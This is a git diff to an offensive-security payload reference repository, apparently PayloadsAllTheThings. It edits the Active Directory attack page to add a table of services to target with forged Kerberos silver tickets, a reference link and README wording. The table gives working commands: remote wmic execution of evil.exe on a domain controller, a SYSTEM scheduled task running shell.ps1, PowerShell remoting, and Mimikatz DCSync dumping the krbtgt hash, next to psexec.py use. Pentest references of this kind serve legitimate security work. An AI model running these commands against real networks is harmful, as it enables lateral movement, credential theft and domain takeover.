diff --git a/.github/banner.png b/.github/banner.png new file mode 100644 index 00000000..5c705eb1 Binary files /dev/null and b/.github/banner.png differ diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 72ad555a..5895858b 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -722,7 +722,7 @@ Mitigations: ### Pass-the-Ticket Silver Tickets -Forging a TGS require machine accound password (key) or NTLM hash from the KDC +Forging a TGS require machine accound password (key) or NTLM hash of the service account. ```powershell # Create a ticket for the service @@ -739,6 +739,19 @@ root@kali:/tmp$ export KRB5CCNAME=/home/user/ticket.ccache root@kali:/tmp$ ./psexec.py -k -no-pass -dc-ip 192.168.1.1 AD/administrator@192.168.1.100 ``` +Interesting services to target with a silver ticket : + +| Service Type | Service Silver Tickets | Attack | +|---------------------------------------------|------------------------|--------| +| WMI | HOST + RPCSS | `wmic.exe /authority:"kerberos:DOMAIN\DC01" /node:"DC01" process call create "cmd /c evil.exe"` | +| PowerShell Remoting | HTTP + wsman | `New-PSSESSION -NAME PSC -ComputerName DC01; Enter-PSSession -Name PSC` | +| WinRM | HTTP + wsman | `New-PSSESSION -NAME PSC -ComputerName DC01; Enter-PSSession -Name PSC` | +| Scheduled Tasks | HOST | `schtasks /create /s dc01 /SC WEEKLY /RU "NT Authority\System" /IN "SCOM Agent Health Check" /IR "C:/shell.ps1"` | +| Windows File Share (CIFS) | CIFS | `dir \\dc01\c$` | +| LDAP operations including Mimikatz DCSync | LDAP | `lsadump::dcsync /dc:dc01 /domain:domain.local /user:krbtgt` | +| Windows Remote Server Administration Tools | RPCSS + LDAP + CIFS | / | + + Mitigations: * Set the attribute "Account is Sensitive and Cannot be Delegated" to prevent lateral movement with the generated ticket. @@ -1635,6 +1648,7 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 6b3723410a3c5 * [Exploiting PrivExchange - April 11, 2019 - @chryzsh](https://chryzsh.github.io/exploiting-privexchange/) * [Exploiting Unconstrained Delegation - Riccardo Ancarani - 28 APRIL 2019](https://www.riccardoancarani.it/exploiting-unconstrained-delegation/) * [Finding Passwords in SYSVOL & Exploiting Group Policy Preferences](https://adsecurity.org/?p=2288) +* [How Attackers Use Kerberos Silver Tickets to Exploit Systems - Sean Metcalf](https://adsecurity.org/?p=2011) * [Fun with LDAP, Kerberos (and MSRPC) in AD Environments](https://speakerdeck.com/ropnop/fun-with-ldap-kerberos-and-msrpc-in-ad-environments) * [Getting the goods with CrackMapExec: Part 1, by byt3bl33d3r](https://byt3bl33d3r.github.io/getting-the-goods-with-crackmapexec-part-1.html) * [Getting the goods with CrackMapExec: Part 2, by byt3bl33d3r](https://byt3bl33d3r.github.io/getting-the-goods-with-crackmapexec-part-2.html) diff --git a/README.md b/README.md index adcb2fe7..d7c9461f 100644 --- a/README.md +++ b/README.md @@ -1,4 +1,4 @@ -# Payloads All The Things +# Payloads All The Things [![Tweet](https://img.shields.io/twitter/url/http/shields.io.svg?style=social)](https://twitter.com/intent/tweet?text=Payloads%20All%20The%20Things,%20a%20list%20of%20useful%20payloads%20and%20bypasses%20for%20Web%20Application%20Security%20-%20by%20@pentest_swissky&url=https://github.com/swisskyrepo/Koalemos) A list of useful payloads and bypasses for Web Application Security. Feel free to improve with your payloads and techniques ! @@ -8,13 +8,13 @@ You can also contribute with a :beers: IRL, or using the sponsor button.

- +

Every section contains the following files, you can use the `_template_vuln` folder to create a new chapter: -- README.md - vulnerability description and how to exploit it +- README.md - vulnerability description and how to exploit it, including several payloads - Intruder - a set of files to give to Burp Intruder - Images - pictures for the README.md - Files - some files referenced in the README.md